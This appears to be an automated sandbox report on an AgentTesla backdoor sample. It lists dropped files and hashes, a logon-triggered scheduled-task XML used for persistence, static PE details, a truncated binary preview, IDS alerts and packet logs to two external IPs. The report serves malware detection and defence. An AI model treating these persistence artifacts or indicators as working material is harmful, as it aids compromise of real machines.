Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlghwjt0.ldc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvokjb13.ohv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruztdt04.kyl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp16A5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1599
Entropy (8bit):	5.093817402156752
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLPxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTtv
MD5:	39CAE6CA1B3CD5E9311A5C66CB3410BE
SHA1:	B0960C381149D5BF50F71110F648176E68AE25CD
SHA-256:	2147B18224FA81D62B72596F56C1FDEFD7CC51E58169F94C4E0EFB1BB98CCD8F
SHA-512:	B4DDC8E38D78C2A9280BC7432D1763FC0A78B32E923C76E7E271FCC83BD6C4DDA0397661F0CC99A92782271AFCBEFC0F467CB9F2BDF65BE0B5A933347C9334F1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp550.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1599
Entropy (8bit):	5.093817402156752
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLPxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTtv
MD5:	39CAE6CA1B3CD5E9311A5C66CB3410BE
SHA1:	B0960C381149D5BF50F71110F648176E68AE25CD
SHA-256:	2147B18224FA81D62B72596F56C1FDEFD7CC51E58169F94C4E0EFB1BB98CCD8F
SHA-512:	B4DDC8E38D78C2A9280BC7432D1763FC0A78B32E923C76E7E271FCC83BD6C4DDA0397661F0CC99A92782271AFCBEFC0F467CB9F2BDF65BE0B5A933347C9334F1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	674304
Entropy (8bit):	7.949374643357728
Encrypted:	false
SSDEEP:	12288:kgc3Vk+O7TL2S/2NuAigYNlU90z7rOICfPoTkZPg0:kgYk+m7AigylU90z7mFZX
MD5:	B2B44061F8271AD0F7D3A4FEBEB07751
SHA1:	D312798B7737931CB492ABB1B7BD870F44BD9677
SHA-256:	BC5EE788C33389A426C9B5B10405A41A83F6875864BF09B0DE6DF15AB88CFBDA
SHA-512:	C83FCB92A4F175857B621F9B6B411477A8AEED38024A907515A7EC3218FF58A9D05DE2D7D09AC5A18E38E400AD3D1F5263B9838DF3565AC6FE55964021CF168A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................4..........~S... ........@.. ....................................@.................................(S..S....`............................................................................... ............... ..H............text....3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............H..............@..B................`S......H............J......R....................................................0..A....... .........%.3...(.....4... .........%.H...(.....I...(G........&....0..........~4.....~I..........E........z...".......\...E...z...........E..........-....3. .d..Y..+..+......+...1....B. ....Y..+... ..... .6..Y+..... ..... ....Y..8u.....X.......X....(. .P..Y..8W.....1....8K......>. ....Y+..*....0..........~4.....~I..........E............f...........$...W...$.................../..... .G..Y..+.

C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.949374643357728
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe
File size:	674'304 bytes
MD5:	b2b44061f8271ad0f7d3a4febeb07751
SHA1:	d312798b7737931cb492abb1b7bd870f44bd9677
SHA256:	bc5ee788c33389a426c9b5b10405a41a83f6875864bf09b0de6df15ab88cfbda
SHA512:	c83fcb92a4f175857b621f9b6b411477a8aeed38024a907515a7ec3218ff58a9d05de2d7d09ac5a18e38e400ad3d1f5263b9838df3565ac6fe55964021cf168a
SSDEEP:	12288:kgc3Vk+O7TL2S/2NuAigYNlU90z7rOICfPoTkZPg0:kgYk+m7AigylU90z7mFZX
TLSH:	FAE423803BB91823DBFE27BA8DB13000437675D2A821D3AA5CC954C91F96748E5EDF67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4..........~S... ........@.. ....................................@................................

File Icon


Icon Hash:	d1b2b0d1d3d1d191

Static PE Info

General

Entrypoint:	0x4a537e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66E789D4 [Mon Sep 16 01:28:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa5328	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa6000	0x1200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa3384	0xa3400	3a9a60f12d6f256b598114fd65ff4dde	False	0.9648063624617151	data	7.9573634089083	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa6000	0x1200	0x1200	8e5903dd5b86b508de4ab22483269864	False	0.6134982638888888	data	6.563939316015928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0xc	0x200	aff21f2cefdc49d531565d37bffc20d8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa60c8	0xcac	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.7219482120838471
RT_GROUP_ICON	0xa6d84	0x14	data	1.05
RT_VERSION	0xa6da8	0x364	data	0.4423963133640553

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-22T15:42:20.424360+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49712	132.226.247.73	80	TCP
2024-10-22T15:42:21.954971+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49712	132.226.247.73	80	TCP
2024-10-22T15:42:22.522517+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49716	188.114.96.3	443	TCP
2024-10-22T15:42:23.595397+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49718	132.226.247.73	80	TCP
2024-10-22T15:42:24.610277+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49722	188.114.96.3	443	TCP
2024-10-22T15:42:24.907916+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49721	132.226.247.73	80	TCP
2024-10-22T15:42:25.923518+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49721	132.226.247.73	80	TCP
2024-10-22T15:42:26.263025+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49730	188.114.96.3	443	TCP
2024-10-22T15:42:26.663881+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49736	188.114.96.3	443	TCP
2024-10-22T15:42:27.720395+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49742	132.226.247.73	80	TCP
2024-10-22T15:42:30.150395+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49760	188.114.96.3	443	TCP
2024-10-22T15:42:31.472056+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49768	188.114.96.3	443	TCP
2024-10-22T15:42:33.444590+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49784	188.114.96.3	443	TCP
2024-10-22T15:42:35.919780+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49799	188.114.96.3	443	TCP
2024-10-22T15:42:35.935018+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49798	188.114.96.3	443	TCP
2024-10-22T15:42:39.220810+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49825	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 22, 2024 15:42:19.155591965 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:19.161211014 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:19.161279917 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:19.161592960 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:19.168242931 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:20.103437901 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:20.108005047 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:20.114717960 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:20.372724056 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:20.424360037 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:20.496160030 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:20.496205091 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:20.496447086 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:20.502398014 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:20.502418995 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.137077093 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.137177944 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.143696070 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.143726110 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.144191027 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.204742908 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.356206894 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.403328896 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.500617981 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.500699043 CEST	443	49715	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.500780106 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.506856918 CEST	49715	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.514704943 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:21.520134926 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:21.774007082 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:21.776631117 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.776671886 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.776741028 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.777115107 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:21.777131081 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:21.954971075 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.381083965 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:22.383516073 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:22.383537054 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:22.522530079 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:22.522629023 CEST	443	49716	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:22.522722960 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:22.523088932 CEST	49716	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:22.526228905 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.527417898 CEST	49718	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.532556057 CEST	80	49712	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:22.532599926 CEST	49712	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.533128023 CEST	80	49718	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:22.533202887 CEST	49718	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.533277035 CEST	49718	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:22.538853884 CEST	80	49718	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:23.350908041 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:23.356549025 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:23.356638908 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:23.357048035 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:23.362381935 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:23.412312984 CEST	80	49718	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:23.413803101 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:23.413860083 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:23.413928986 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:23.414161921 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:23.414170980 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:23.595396996 CEST	49718	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.192867041 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.194716930 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.194747925 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.472954988 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.474092007 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.474349022 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.477407932 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.483164072 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.610261917 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.610368013 CEST	443	49722	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.610455990 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.611629963 CEST	49722	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.622853994 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.628498077 CEST	80	49723	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.628765106 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.628892899 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:24.635008097 CEST	80	49723	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.736464977 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:24.775172949 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.775224924 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.775285006 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.780077934 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:24.780097008 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:24.907916069 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:25.383472919 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.383565903 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.385113001 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.385122061 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.385488033 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.439130068 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.468095064 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.494057894 CEST	80	49723	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:25.495346069 CEST	49730	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.495452881 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.495628119 CEST	49730	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.496154070 CEST	49730	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.496189117 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.511336088 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.548506021 CEST	49723	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:25.608807087 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.608942032 CEST	443	49724	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.609003067 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.613945007 CEST	49724	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.620951891 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:25.626393080 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:25.878968000 CEST	80	49721	132.226.247.73	192.168.2.6
Oct 22, 2024 15:42:25.881032944 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.881115913 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.881205082 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.881535053 CEST	49736	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:25.881556034 CEST	443	49736	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:25.923517942 CEST	49721	80	192.168.2.6	132.226.247.73
Oct 22, 2024 15:42:26.118182898 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.119998932 CEST	49730	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:26.120044947 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.263019085 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.263122082 CEST	443	49730	188.114.96.3	192.168.2.6
Oct 22, 2024 15:42:26.263499975 CEST	49730	443	192.168.2.6	188.114.96.3
Oct 22, 2024 15:42:26.263951063 CEST	49730	443	192.168.2.6	188.114.96.3
